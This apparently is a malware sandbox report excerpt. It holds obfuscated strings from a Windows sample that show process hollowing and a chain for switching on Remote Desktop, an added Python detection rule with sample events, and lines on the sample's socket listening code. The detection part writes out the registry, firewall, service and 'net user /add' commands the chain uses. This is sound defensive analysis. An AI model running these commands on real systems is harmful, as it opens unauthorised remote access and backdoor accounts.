FXXRNMHSTRa00ykWEXjRSki5jjheTZqfHvo37OXfqe9g1dxJRKwFtXVHw7UOS2=N1Kv8UPsRwXmW5aUSCXKPuQU7kzaekLye2VQ3q6oW5W5ZICw9lTv4SA6PTVegDPfYmbaP069S3 TXJyQQDzTKKUyNYm=W5aUSCXKPuQo6kHneZrO2XGmCHC9W5WDfqakWVP IcIs5TDtdUHreGvVNJWl1JWAXqalWUaGJq==ZHpxJBC=TKKnVVXp6vQe8EHeej8uOl8IP1KrdKW5c0YvTKKnVVXp6vQe8EHeej8uOlbIP1KrdKW5c0YvW4YHSDfyMaY6NTb9fj3ue2PQNJaldpSAf7BhQjT ITYr7jLjgCTgfnDf261=WLywWFXg6u8a6TK=OnpyLO==OnpzJe==OnpyKe==OnpzKO==S7Kz kXr6uMU5Tn ZE==Qnd7erKvWEzpEpLnTU8aN6hhKrGi 0vo3MAlCzZbLz3keSq9KmpnGgDX3M4e60LPLAybMiO7PKSoKD==LmNhOVjm6sL=KmpnGgDvRM7 KGNnFy==WKY4WVLw3wYl6zVahDO=N0K5WUPY6woo6krkeDfehSroP0YrfJWEc03vWUSdDK2i6DK6Ld==Kk==e672aETs6S7 FUC6OUKbPA==e7F u==equvWEaqU6K6Vkae5cT NDvUe0PV0FroP0ur0ZR=OHpxJBCXEJn=OHpxJBCXE L=OHpxJBCXE P=OHpxJBCXES1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termser
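The plaintext tail of the strings above (fDenyTSConnections under SYSTEM\CurrentControlSet\Control\Terminal Server, the netsh advfirewall "Remote Desktop" rule group, sc config termservice start= auto, net start termservice, and a trailing /add) is the usual chain for switching on RDP and opening the firewall for it. The following detection logic is an added example and is not part of the Joe Sandbox report or of the sample: it correlates constructed Sysmon-style process-creation records and flags a host on which three or more stages of that chain appear within a short window, whatever order they run in. The exact reg add and net user command lines are inferred from the fragments in the dump and are assumptions.

```python
"""Correlate the RDP-enablement command chain across process-creation events.

Added example, not from the sandbox report. Events are constructed to look
like Sysmon Event ID 1 records; the reg add / net user syntax is inferred from
the string fragments and is an assumption.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex per stage, applied to the normalised (lower-cased, whitespace-collapsed) command line.
STAGES = {
    "rdp_reg_enable": re.compile(
        r"terminal server.*fdenytsconnections.*(?:/d\s*0\b|-value\s+0\b)"),
    "rdp_firewall_open": re.compile(
        r'netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="?remote desktop"?\s+new\s+enable=yes'),
    "termservice_autostart": re.compile(r"sc\s+config\s+termservice\s+start=\s*auto"),
    "termservice_start": re.compile(r"net\s+start\s+termservice"),
    "local_user_add": re.compile(r"net\s+user\s+\S+\s+\S+\s+/add"),
}

# Constructed sample events (not real telemetry): four stages on WS01 within
# seconds, and one lone benign-looking "net start termservice" on WS02.
SAMPLE_EVENTS = [
    {"UtcTime": "2025-03-25 10:14:02", "Computer": "WS01", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"UtcTime": "2025-03-25 10:14:03", "Computer": "WS01", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes'},
    {"UtcTime": "2025-03-25 10:14:03", "Computer": "WS01", "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": "sc config TermService start= auto"},
    {"UtcTime": "2025-03-25 10:14:04", "Computer": "WS01", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net start termservice"},
    {"UtcTime": "2025-03-25 11:00:00", "Computer": "WS02", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net start termservice"},
]


def normalise(cmd: str) -> str:
    """Lower-case and collapse whitespace so 'start= auto' and 'START=auto' both match."""
    return re.sub(r"\s+", " ", cmd).strip().lower()


def classify(event: dict) -> list:
    """Return the names of every chain stage the event's command line matches."""
    cmd = normalise(event["CommandLine"])
    return [name for name, rx in STAGES.items() if rx.search(cmd)]


def correlate(events: list, window: timedelta = timedelta(minutes=5), min_stages: int = 3) -> list:
    """Group stage hits per host and alert when >= min_stages distinct stages fall inside `window`.

    A single stage on its own (an admin enabling RDP by hand) does not alert;
    the chain is the signal, not any one command.
    """
    hits = defaultdict(list)  # host -> [(timestamp, stage, event)]
    for ev in events:
        ts = datetime.fromisoformat(ev["UtcTime"])
        for stage in classify(ev):
            hits[ev["Computer"]].append((ts, stage, ev))

    alerts = []
    for host, items in hits.items():
        items.sort(key=lambda x: x[0])
        for i, (t0, _, _) in enumerate(items):
            in_window = [x for x in items[i:] if x[0] - t0 <= window]
            stages = {s for _, s, _ in in_window}
            if len(stages) >= min_stages:
                alerts.append({
                    "host": host,
                    "first_seen": t0.isoformat(),
                    "stages": sorted(stages),
                    "processes": sorted({e["Image"] for _, _, e in in_window}),
                })
                break  # one alert per host is enough
    return alerts


if __name__ == "__main__":
    print(json.dumps(correlate(SAMPLE_EVENTS), indent=2))
```

The window and stage threshold are tunable: a lower threshold catches partial chains at the cost of alerting on legitimate RDP enablement, and pairing the alert with the account-creation stage (the /add fragment) is what separates this behaviour from routine administration.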
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E61204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00E61204
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E61806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00E61806